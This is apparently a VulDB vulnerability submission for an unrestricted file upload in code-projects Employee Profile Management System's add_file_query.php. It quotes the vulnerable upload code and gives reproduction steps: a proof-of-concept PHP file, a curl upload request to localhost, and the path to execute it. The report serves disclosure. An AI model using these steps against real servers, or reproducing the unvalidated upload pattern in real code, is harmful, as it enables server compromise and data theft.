| 제목 | code-projects Employee Profile Management System published November 15, 2025 Unrestricted Upload |
|---|
| 설명 | Summary
The vulnerability exists in the file upload component (Profiling/add_file_query.php) due to missing validation of uploaded file types and content. The application allows arbitrary files—including executable .php files—to be uploaded into a web-accessible directory.
Root Cause
The server stores uploaded files directly under Profiling/uploads/ using the original filename from the client:
$target_dir = "uploads/";
$target_file = $target_dir . basename($_FILES["per_file"]["name"]);
move_uploaded_file($_FILES["per_file"]["tmp_name"], $target_file);
There is no extension restriction, no MIME checking, no content inspection, no filename randomization, and the upload directory is inside the web root. Therefore, a user can upload a PHP file that the server later executes.
Reproduction
Login as a normal user who has access to the “Add File” feature.
Upload the following file as shell.php:
<?php echo "EXECUTED: " . __FILE__; ?>
Send the upload request (example using curl):
curl -X POST "http://localhost/Profiling/add_file_query.php" \
-F "per_name=1" \
-F "[email protected]" \
-F "upload=Save"
Access the uploaded file directly:
http://localhost/Profiling/uploads/shell.php
The PHP code executes and prints the message, confirming arbitrary code execution.
Impact
This allows remote attackers to upload and execute arbitrary PHP code on the server. Successful exploitation leads to full server compromise, including command execution, data theft, privilege escalation, and persistent backdoor installation. |
|---|
| 원천 | ⚠️ https://github.com/shenxianyuguitian/employee-management-UFU |
|---|
| 사용자 | xuanyuesanshi (UID 88126) |
|---|
| 제출 | 2025. 11. 21. AM 08:26 (5 개월 ago) |
|---|
| 모더레이션 | 2025. 12. 06. PM 06:22 (15 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 334615 [code-projects Employee Profile Management System 1.0 add_file_query.php per_file 권한 상승] |
|---|
| 포인트들 | 20 |
|---|